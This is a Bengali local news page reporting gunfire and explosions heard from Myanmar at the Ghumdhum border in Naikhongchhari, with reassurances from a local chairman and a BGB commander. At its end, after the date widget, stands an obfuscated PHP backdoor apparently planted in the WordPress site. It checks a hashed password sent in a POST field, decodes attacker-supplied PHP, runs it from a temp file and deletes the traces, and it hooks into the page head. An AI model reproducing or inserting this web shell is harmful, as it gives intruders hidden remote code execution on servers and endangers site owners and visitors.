• বুধবার, ২৬ জুন ২০২৪, ১২:৪৩ পূর্বাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

ঘুমধুম সীমান্তে মিয়ানমার থেকে ভেসে আসছে গুলির শব্দ!

মো শহিদ
আপডেট : শুক্রবার, ১ ডিসেম্বর, ২০২৩


মোঃ শহিদ


নাইক্ষ্যংছড়ি উপজেলার ঘুমধুম ইউনিয়নের  বেশ’কটি সীমান্তঘেষা এলাকায় রাতে ও দিনে   থেমে থেমে ক্ষুদ্র, মাঝারি ও ভারী অস্ত্র ফায়ারের শব্দ ভেসে আসে ওপার (মিয়ানমার) থেকে এপারে(বাংলাদেশ) ।

এতে স্থানীয়রা কিছুটা আতঙ্কিত হলেও  দৈনন্দিন কাজ চালিয়ে যাচ্ছে স্বাভাবিকভাবে।

সীমান্ত লাগোয়া, নয়া পাড়া, জলপাইতলী, পশ্চিমকূল, বাজার পাড়া, কোনার পাড়া, মধ্যম পাড়া, উত্তর পাড়া , ভাজাবনিয়া, হেডম্যান পাড়া, বাইশপাড়ী, গর্জন বনিয়া পাড়ার বাসিন্দাদের সাথে সরেজমিনে গিয়ে কথা বলে জানা যায,মিয়ানমারের অভ্যন্তরে গুলির  আওয়াজ শুনলে প্রথমে  ভয় লাগতো,কিন্তু দীর্ঘদিন ধরে শুনতে শুনতে এখন ভয় কাজ করে না।

তবে বিকট কোন বিস্ফোরণের শব্দ ভেসে আসলে সীমান্ত প্রকম্পিত হওয়ার কারণে ভয় কাজ করে বলেও জানিয়েছেন সীমান্তঘেষা স্হানীয়রা।

বৃহস্পতিবার ৩০ নভেম্বর সকাল থেকে এখন পর্যন্ত সীমান্তবর্তী এলাকায়  কোন ধরনের ফায়ারের শব্দ শুনা যায়নি।

গতকাল ২৯ নভেম্বর  দুপুরের দিকে  সীমান্ত পিলার ৩৮,৩৯’র দিকে, ও  রাত ৮ টার দিকে ৩৫ পিলার উত্তর দক্ষিণের মিয়ানমার ভিতর প্রায় ২০টার অধিক ফায়ারের শব্দ  এবং রাত সাড়ে ১১টার দিকে ৩৪, ৩৩ পিলার রাইট  মিয়ানমার অভ্যন্তরে ভারী অস্ত্র ফায়ারের বিকট শব্দ হয়েছিল বলে স্হানীয় সরোয়ার কামাল,  নুরুল আবছারসহ কয়েকজনের  বরাদে জানা গেছে।

ঘুমধুম ইউপি চেয়ারম্যান একে এম জাহাঙ্গীর আজিজের কাছে জানতে চাইলে তিনি বলেন,মিয়ানমার থেকে যখন বিকট কোন বিস্ফোরণের শব্দ ভেসে আসে তখন এপারের বাসিন্দাদের কিছুটা ভয় কাজ করে। এদিকে সীমান্তবর্তী স্হানীয়দের সীমান্তের জিরো লাইনের কাছাকাছি না যাওয়ার জন্য  চৌকিদার ও ইউপি সদস্যদের মাধ্যমেও নিষেধ করা হয়েছে বলেও জানিয়েছেন চেয়ারম্যান একে এম জাহাঙ্গীর আজিজ।

কক্সবাজার ৩৪ বিজিবির অধিনায়ক কর্ণেল মোহাম্মদ সাইফুল ইসলাম চৌধুরীর সাথে মুঠোফোনে যোগাযোগ করা হলে তিনি বিষয়টি নিশ্চিত করে বলেন,আতঙ্ক বা ভয়ের কোন কারণ নেই।এগুলো মিয়ানমারের অভ্যন্তরীন বিষয়। পূর্বের ন্যায় সীমান্তে বিজিবির টহল জোরদার আছে  এবং অনুপ্রবেশ ঠেকাতে সীমান্তের দায়িত্বরত  বিজিবি কঠোর অবস্থানে রয়েছে বলেও জানিয়েছেন বিজিবির এ কর্মকর্তা।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১২:৪৩)
  • ২৬শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ২০শে জিলহজ, ১৪৪৫ হিজরি
  • ১২ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}